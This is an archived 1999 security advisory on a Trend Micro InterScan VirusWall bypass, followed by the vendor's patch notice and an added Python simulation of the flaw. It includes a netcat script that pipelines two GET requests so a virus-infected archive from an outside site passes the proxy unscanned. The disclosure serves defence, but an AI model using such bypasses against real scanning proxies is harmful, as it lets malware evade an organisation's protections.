interscan.viruswall.txt

17 Aug 1999 00:00:00 | Reported by s10 | Type: packetstorm
Source: packetstormsecurity.com

InterScan VirusWall allows infected files to be downloaded without warning via specific requests.

Code
`Date: Mon, 22 Feb 1999 21:31:51 +0100  
From: The Unicorn <[email protected]>  
To: [email protected]  
Subject: BlackHats Advisory -- InterScan VirusWall  
  
BlackHats Security Advisory  
  
  
Release date: February 22, 1999  
Application: InterScan Viruswall for Solaris  
Severity: Any user can download binaries and virus  
infected files through the VirusWall  
  
Author(s): [email protected], [email protected]  
  
---  
Overview :  
---  
  
InterScan VirusWall is part of Trend Micro's integrated family  
of virus protection products that covers every access point - Internet  
gateways, groupware, e-mail and intranet servers, LAN servers, and  
desktops. InterScan VirusWall scans inbound and outbound SMTP mail and  
attachments, FTP and HTTP traffic in real time. It automatically cleans  
infected files and detects malicious Java applets and ActiveX objects.  
  
When two HTML GET commands are combined in one request, of which  
the former points to a non-scanned file like a graphic image (i.e. a GIF  
file) and the latter to a possibly infected binary or macro file, both  
of the files are passed to the user requesting the data without any  
warning or logging by the VirusWall. We found that this combination  
was sometimes generated by well-known web browsers like Netscape  
Communicator and Microsoft Internet Explorer during normal use.  
  
We informed Trend Micro of this vulnerability more than three  
weeks ago. We fully described the problem to Trend Engineering and  
included an exploit similar to the one described below and all traffic  
between the browser and VirusWall, but did not receive a fix for this  
problem. The explanation received was that they were unable to reproduce  
it on their systems. Since these systems are used to protect people  
behind (expensive) firewall configurations against virus infection, we  
decided to make, at least, the administrators of these systems aware of  
this exploit that can be used by users behind an InterScan VirusWall  
configuration to circumvent the implemented security policy.  
  
---  
Affected systems:  
---  
  
InterScan Viruswall for Solaris  
Implementations of InterScan VirusWall on other platforms are  
likely to be vulnerable, but are not tested since we do not have  
them available  
  
---  
Workarounds/Fixes:  
---  
  
We have not yet received a fix from Trend Micro. It might be  
possible to close this hole by scanning *ALL* data passed in HTTP  
traffic, but this will have a negative influence on the throughput of  
the complete firewall configuration.  
  
---  
Example:  
---  
  
We developed the following exploit that requests two files in  
one message. The first one is a simple graphic file (in this case from  
the Trend Micro web-site) and the second one is a file containing a well-  
known macro-virus, which would normally be detected and removed by the  
product. Using the netcat tool we send this combined request out to the  
world using the VirusWall as a proxy-server. The information received  
back is stored in a file. When later examining the file we find both the  
graphic and the virus infected contents requested. Looking through the  
logfiles no trace is found of this file seeping through the hole.  
  
#!/bin/sh
# Two HTTP/1.0 GETs sent back to back on one proxy connection
# (Proxy-Connection: Keep-Alive). The first fetches a GIF, a type the
# VirusWall does not scan; the second fetches the infected archive.
# "viruswall" is the hostname of the InterScan proxy, listening on port 80.
# Line endings are bare LF, as in the original script.
echo "GET http://www.antivirus.com/vinfo/images/amb1.gif HTTP/1.0
Referer: http://www.antivirus.com/index.html
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.5 [en] (WinNT; I)
Host: www.antivirus.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

GET http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip HTTP/1.0
Referer: http://sourceofkaos.com/homes/knowdeth/index.html
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.5 [en] (WinNT; I)
Host: sourceofkaos.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

" | nc viruswall 80 > the.results
# the.results now holds both responses back to back: the GIF, then the
# archive that was relayed without being scanned.
  
Changing the second part of this "code" will enable downloading  
any information through the Trend Micro InterScan VirusWall, probably  
because the product only acts on the first GET command in a message  
while retrieving all information requested.  
  
---  
Further Study:  
---  
  
Further study of this vulnerability may focus on FTP and SMTP  
traffic and the detection of malicious Java applets and ActiveX objects.  
  
  
Ciao,  
Unicorn.  
--  
======= _ __,;;;/ TimeWaster ================================================  
,;( )_, )~\| A Truly Wise Man Never Plays  
;; // `--; Leapfrog With A Unicorn...  
==='= ;\ = | ==== Youth is Not a Time in Life, It is a State of Mind! =======  
  
----------------------------------------------------------------------------------  
  
Date: Thu, 25 Feb 1999 12:28:46 -0800  
From: Bob Li <[email protected]>  
To: [email protected]  
Subject: Patch for InterScan VirusWall for Unix now available  
  
We have been recently notified about a potential security hole in our  
InterScan Web VirusWall for Solaris product via the "BlackHats Security  
Advisory". The potential problem described relates to being able to  
download binaries and virus infected files by using HTTP proxy "keep-alive"  
connections.  
  
We have looked into the description of the problem and have identified that  
there was a problem with the software. As a result, we are issuing a patch  
which can be obtained from Trend Micro at http://www.antivirus.com to  
resolve the problem.  
  
This issue applies to InterScan for Solaris and HP-UX. The Windows NT  
version of InterScan does not have this problem.  
  
Bob Li  
Product Manager  
Trend Micro, Inc.  
E-Mail: [email protected]  
Phone: 408-863-6341  
  
`
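The following is an added example and is not code from the advisory, from Packet Storm or from Trend Micro. It models the bypass the advisory describes: a scanning proxy that makes its scan/no-scan decision once per connection, from the first response (a GIF, a type it does not scan), and then relays every later pipelined response on that keep-alive connection unscanned. Beside it is the fix the advisory proposes, scanning every request on the connection. The hostnames (`images.example`, `files.example`), the file contents, the `TOY-MACRO-VIRUS-MARKER` signature and the per-connection decision rule are all assumptions made for this model; the product's real internals are not known from the page.

```python
"""
Model of the keep-alive / pipelining bypass from the BlackHats advisory.
Added example, not vendor code. Nothing here touches the network: the
"origin servers", file contents and scanner signature are constructed.
"""
import re

# Constructed origin content: url -> (content_type, body). Hosts are not real.
ORIGIN = {
    "http://images.example/logo.gif": ("image/gif", b"GIF89a" + b"\x00" * 20),
    "http://files.example/boom-a.zip": ("application/zip",
                                        b"PK\x03\x04" + b"TOY-MACRO-VIRUS-MARKER" + b"\x00" * 8),
}
TOY_SIGNATURE = b"TOY-MACRO-VIRUS-MARKER"      # constructed: what scan() looks for
UNSCANNED_TYPES = {"image/gif", "image/jpeg"}   # assumption: types the proxy skips

REQUEST_LINE = re.compile(rb"(GET|HEAD) (\S+) HTTP/1\.[01]\r?\n")
HEADER_END = re.compile(rb"\r?\n\r?\n")


def build_pipelined_request(urls):
    """Emit N absolute-URI GETs back to back on one connection, the shape
    the advisory's netcat script sends (CRLF line endings here)."""
    parts = []
    for url in urls:
        host = url.split("/")[2]
        parts.append("GET %s HTTP/1.0\r\nHost: %s\r\n"
                     "Proxy-Connection: Keep-Alive\r\nAccept: */*\r\n\r\n" % (url, host))
    return "".join(parts).encode()


def split_pipelined(buf):
    """Split one buffer into [(method, url, headers), ...]. Bodyless
    requests only (GET/HEAD), which is all the advisory's exploit uses."""
    out, pos, n = [], 0, len(buf)
    while pos < n:
        while pos < n and buf[pos:pos + 1] in (b"\r", b"\n"):   # stray blank lines
            pos += 1
        if pos >= n:
            break
        m = REQUEST_LINE.match(buf, pos)
        if m is None:
            raise ValueError("malformed request line at offset %d" % pos)
        # Search from just before the request line's newline so a header-less
        # request (request line, then a blank line) still terminates cleanly.
        end = HEADER_END.search(buf, m.end() - 1)
        if end is None:
            raise ValueError("incomplete request at offset %d" % pos)
        headers = {}
        for line in buf[m.end():end.start()].split(b"\n"):
            line = line.strip(b"\r")
            if b":" in line:
                k, v = line.split(b":", 1)
                headers[k.strip().lower().decode()] = v.strip().decode()
        out.append((m.group(1).decode(), m.group(2).decode(), headers))
        pos = end.end()
    return out


def fetch(url):
    """Constructed origin lookup: (content_type, body), no network access."""
    return ORIGIN.get(url, ("text/plain", b"not found"))


def scan(body):
    """Toy content scanner: true when the constructed signature is present."""
    return TOY_SIGNATURE in body


def per_connection_proxy(buf):
    """Vulnerable model (assumption consistent with the advisory): decide
    scan/no-scan once, from the first response's type, then apply that
    decision to everything relayed on the keep-alive connection."""
    requests = split_pipelined(buf)
    if not requests:
        return []
    first_type, _ = fetch(requests[0][1])
    scanning = first_type not in UNSCANNED_TYPES
    verdicts = []
    for _, url, _ in requests:
        _, body = fetch(url)
        verdicts.append((url, "blocked" if scanning and scan(body) else "delivered"))
    return verdicts


def per_request_proxy(buf):
    """Fixed model, the advisory's workaround: scan every response on the
    connection, whatever the first one looked like."""
    verdicts = []
    for _, url, _ in split_pipelined(buf):
        _, body = fetch(url)
        verdicts.append((url, "blocked" if scan(body) else "delivered"))
    return verdicts


if __name__ == "__main__":
    buf = build_pipelined_request(list(ORIGIN))
    print("vulnerable:", per_connection_proxy(buf))
    print("fixed:     ", per_request_proxy(buf))
```

Run as a script it prints both verdict lists: the per-connection model delivers the archive untouched, the per-request model blocks it. Swapping the request order (archive first) makes the vulnerable model block as well, which is exactly the ordering constraint the advisory describes: the first request must be to a type the product does not scan.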